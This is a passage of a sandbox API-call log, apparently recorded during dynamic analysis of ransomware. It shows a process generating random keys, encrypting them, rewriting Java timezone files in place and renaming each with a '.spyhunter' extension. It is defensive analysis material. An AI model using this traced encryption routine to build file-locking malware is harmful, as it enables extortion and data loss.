lpOverlapped=0x0) returned 1 [0169.340] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5f4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e5f4*=0x30, lpOverlapped=0x0) returned 1 [0169.340] CloseHandle (hObject=0x178) returned 1 [0169.340] GetProcessHeap () returned 0x2c0000 [0169.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.340] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Makassar.spyhunter") returned 67 [0169.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Makassar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\makassar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Makassar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\makassar.spyhunter")) returned 1 [0169.341] GetProcessHeap () returned 0x2c0000 [0169.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.341] GetProcessHeap () returned 0x2c0000 [0169.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.341] GetProcessHeap () returned 0x2c0000 [0169.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebca40 | out: hHeap=0x2c0000) returned 1 [0169.341] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e630 | out: pbBuffer=0x270e630) returned 1 [0169.341] GetProcessHeap () returned 0x2c0000 [0169.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.341] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e628*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e628*=0x30) returned 1 [0169.341] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Magadan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\magadan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.342] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Magadan") returned 56 [0169.342] StrStrW (lpFirst="Magadan", lpSrch=".txt") returned 0x0 [0169.342] GetProcessHeap () returned 0x2c0000 [0169.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.343] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e5ec*=0x245, lpOverlapped=0x0) returned 1 [0169.343] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffdbb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.343] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x245, lpNumberOfBytesWritten=0x270e5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e5ec*=0x245, lpOverlapped=0x0) returned 1 [0169.343] GetProcessHeap () returned 0x2c0000 [0169.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.344] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.344] WriteFile (in: hFile=0x178, lpBuffer=0x270e62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5ec, lpOverlapped=0x0 | out: lpBuffer=0x270e62c*, lpNumberOfBytesWritten=0x270e5ec*=0x4, lpOverlapped=0x0) returned 1 [0169.344] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5ec, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e5ec*=0x30, lpOverlapped=0x0) returned 1 [0169.344] CloseHandle (hObject=0x178) returned 1 [0169.344] GetProcessHeap () returned 0x2c0000 [0169.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.344] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Magadan.spyhunter") returned 66 [0169.344] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Magadan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\magadan"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Magadan.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\magadan.spyhunter")) returned 1 [0169.447] GetProcessHeap () returned 0x2c0000 [0169.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.447] GetProcessHeap () returned 0x2c0000 [0169.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.447] GetProcessHeap () returned 0x2c0000 [0169.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebc980 | out: hHeap=0x2c0000) returned 1 [0169.447] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e630 | out: pbBuffer=0x270e630) returned 1 [0169.447] GetProcessHeap () returned 0x2c0000 [0169.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.447] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e628*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e628*=0x30) returned 1 [0169.448] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Irkutsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\irkutsk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.448] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Irkutsk") returned 56 [0169.448] StrStrW (lpFirst="Irkutsk", lpSrch=".txt") returned 0x0 [0169.448] GetProcessHeap () returned 0x2c0000 [0169.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.448] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e5ec*=0x245, lpOverlapped=0x0) returned 1 [0169.449] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffdbb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.449] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x245, lpNumberOfBytesWritten=0x270e5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e5ec*=0x245, lpOverlapped=0x0) returned 1 [0169.449] GetProcessHeap () returned 0x2c0000 [0169.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.449] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.449] WriteFile (in: hFile=0x178, lpBuffer=0x270e62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5ec, lpOverlapped=0x0 | out: lpBuffer=0x270e62c*, lpNumberOfBytesWritten=0x270e5ec*=0x4, lpOverlapped=0x0) returned 1 [0169.449] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5ec, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e5ec*=0x30, lpOverlapped=0x0) returned 1 [0169.449] CloseHandle (hObject=0x178) returned 1 [0169.449] GetProcessHeap () returned 0x2c0000 [0169.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.450] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Irkutsk.spyhunter") returned 66 [0169.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Irkutsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\irkutsk"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Irkutsk.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\irkutsk.spyhunter")) returned 1 [0169.451] GetProcessHeap () returned 0x2c0000 [0169.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.451] GetProcessHeap () returned 0x2c0000 [0169.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.451] GetProcessHeap () returned 0x2c0000 [0169.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba180 | out: hHeap=0x2c0000) returned 1 [0169.451] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e628 | out: pbBuffer=0x270e628) returned 1 [0169.451] GetProcessHeap () returned 0x2c0000 [0169.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.451] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e620*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e620*=0x30) returned 1 [0169.451] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ho_Chi_Minh" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ho_chi_minh"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.451] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ho_Chi_Minh") returned 60 [0169.451] StrStrW (lpFirst="Ho_Chi_Minh", lpSrch=".txt") returned 0x0 [0169.451] GetProcessHeap () returned 0x2c0000 [0169.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.452] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e5e4*=0x61, lpOverlapped=0x0) returned 1 [0169.452] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.452] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x61, lpNumberOfBytesWritten=0x270e5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e5e4*=0x61, lpOverlapped=0x0) returned 1 [0169.452] GetProcessHeap () returned 0x2c0000 [0169.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.452] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.453] WriteFile (in: hFile=0x178, lpBuffer=0x270e624*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5e4, lpOverlapped=0x0 | out: lpBuffer=0x270e624*, lpNumberOfBytesWritten=0x270e5e4*=0x4, lpOverlapped=0x0) returned 1 [0169.453] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5e4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e5e4*=0x30, lpOverlapped=0x0) returned 1 [0169.453] CloseHandle (hObject=0x178) returned 1 [0169.453] GetProcessHeap () returned 0x2c0000 [0169.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.453] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ho_Chi_Minh.spyhunter") returned 70 [0169.453] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ho_Chi_Minh" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ho_chi_minh"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ho_Chi_Minh.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ho_chi_minh.spyhunter")) returned 1 [0169.453] GetProcessHeap () returned 0x2c0000 [0169.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.454] GetProcessHeap () returned 0x2c0000 [0169.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.454] GetProcessHeap () returned 0x2c0000 [0169.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebacc8 | out: hHeap=0x2c0000) returned 1 [0169.454] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e628 | out: pbBuffer=0x270e628) returned 1 [0169.454] GetProcessHeap () returned 0x2c0000 [0169.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.454] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e620*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e620*=0x30) returned 1 [0169.454] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hovd" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hovd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.455] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hovd") returned 53 [0169.455] StrStrW (lpFirst="Hovd", lpSrch=".txt") returned 0x0 [0169.455] GetProcessHeap () returned 0x2c0000 [0169.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.455] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e5e4*=0x1b5, lpOverlapped=0x0) returned 1 [0169.456] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe4b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.456] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1b5, lpNumberOfBytesWritten=0x270e5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e5e4*=0x1b5, lpOverlapped=0x0) returned 1 [0169.456] GetProcessHeap () returned 0x2c0000 [0169.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.456] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.456] WriteFile (in: hFile=0x178, lpBuffer=0x270e624*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5e4, lpOverlapped=0x0 | out: lpBuffer=0x270e624*, lpNumberOfBytesWritten=0x270e5e4*=0x4, lpOverlapped=0x0) returned 1 [0169.456] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5e4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e5e4*=0x30, lpOverlapped=0x0) returned 1 [0169.456] CloseHandle (hObject=0x178) returned 1 [0169.456] GetProcessHeap () returned 0x2c0000 [0169.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.456] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hovd.spyhunter") returned 63 [0169.456] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hovd" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hovd"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hovd.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hovd.spyhunter")) returned 1 [0169.457] GetProcessHeap () returned 0x2c0000 [0169.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.467] GetProcessHeap () returned 0x2c0000 [0169.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.485] GetProcessHeap () returned 0x2c0000 [0169.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f272b8 | out: hHeap=0x2c0000) returned 1 [0169.485] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e620 | out: pbBuffer=0x270e620) returned 1 [0169.485] GetProcessHeap () returned 0x2c0000 [0169.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.485] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e618*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e618*=0x30) returned 1 [0169.485] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hong_Kong" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hong_kong"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.486] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hong_Kong") returned 58 [0169.486] StrStrW (lpFirst="Hong_Kong", lpSrch=".txt") returned 0x0 [0169.486] GetProcessHeap () returned 0x2c0000 [0169.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.486] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e5dc*=0x269, lpOverlapped=0x0) returned 1 [0169.551] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd97, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.551] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x270e5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e5dc*=0x269, lpOverlapped=0x0) returned 1 [0169.551] GetProcessHeap () returned 0x2c0000 [0169.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.552] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.552] WriteFile (in: hFile=0x178, lpBuffer=0x270e61c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5dc, lpOverlapped=0x0 | out: lpBuffer=0x270e61c*, lpNumberOfBytesWritten=0x270e5dc*=0x4, lpOverlapped=0x0) returned 1 [0169.552] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5dc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e5dc*=0x30, lpOverlapped=0x0) returned 1 [0169.552] CloseHandle (hObject=0x178) returned 1 [0169.552] GetProcessHeap () returned 0x2c0000 [0169.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.552] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hong_Kong.spyhunter") returned 68 [0169.552] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hong_Kong" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hong_kong"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hong_Kong.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hong_kong.spyhunter")) returned 1 [0169.553] GetProcessHeap () returned 0x2c0000 [0169.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.553] GetProcessHeap () returned 0x2c0000 [0169.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.553] GetProcessHeap () returned 0x2c0000 [0169.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba0c0 | out: hHeap=0x2c0000) returned 1 [0169.561] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e620 | out: pbBuffer=0x270e620) returned 1 [0169.561] GetProcessHeap () returned 0x2c0000 [0169.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0169.561] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e618*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e618*=0x30) returned 1 [0169.561] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dushanbe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dushanbe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0169.612] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dushanbe") returned 57 [0169.612] StrStrW (lpFirst="Dushanbe", lpSrch=".txt") returned 0x0 [0169.612] GetProcessHeap () returned 0x2c0000 [0169.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.612] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e5dc*=0x105, lpOverlapped=0x0) returned 1 [0169.613] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffefb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.613] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x105, lpNumberOfBytesWritten=0x270e5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e5dc*=0x105, lpOverlapped=0x0) returned 1 [0169.613] GetProcessHeap () returned 0x2c0000 [0169.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.614] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.614] WriteFile (in: hFile=0xb0, lpBuffer=0x270e61c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5dc, lpOverlapped=0x0 | out: lpBuffer=0x270e61c*, lpNumberOfBytesWritten=0x270e5dc*=0x4, lpOverlapped=0x0) returned 1 [0169.614] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5dc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e5dc*=0x30, lpOverlapped=0x0) returned 1 [0169.614] CloseHandle (hObject=0xb0) returned 1 [0169.614] GetProcessHeap () returned 0x2c0000 [0169.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.614] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dushanbe.spyhunter") returned 67 [0169.614] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dushanbe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dushanbe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dushanbe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dushanbe.spyhunter")) returned 1 [0169.657] GetProcessHeap () returned 0x2c0000 [0169.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.657] GetProcessHeap () returned 0x2c0000 [0169.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0169.657] GetProcessHeap () returned 0x2c0000 [0169.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba000 | out: hHeap=0x2c0000) returned 1 [0169.657] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e618 | out: pbBuffer=0x270e618) returned 1 [0169.658] GetProcessHeap () returned 0x2c0000 [0169.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0169.658] CryptEncrypt (in: 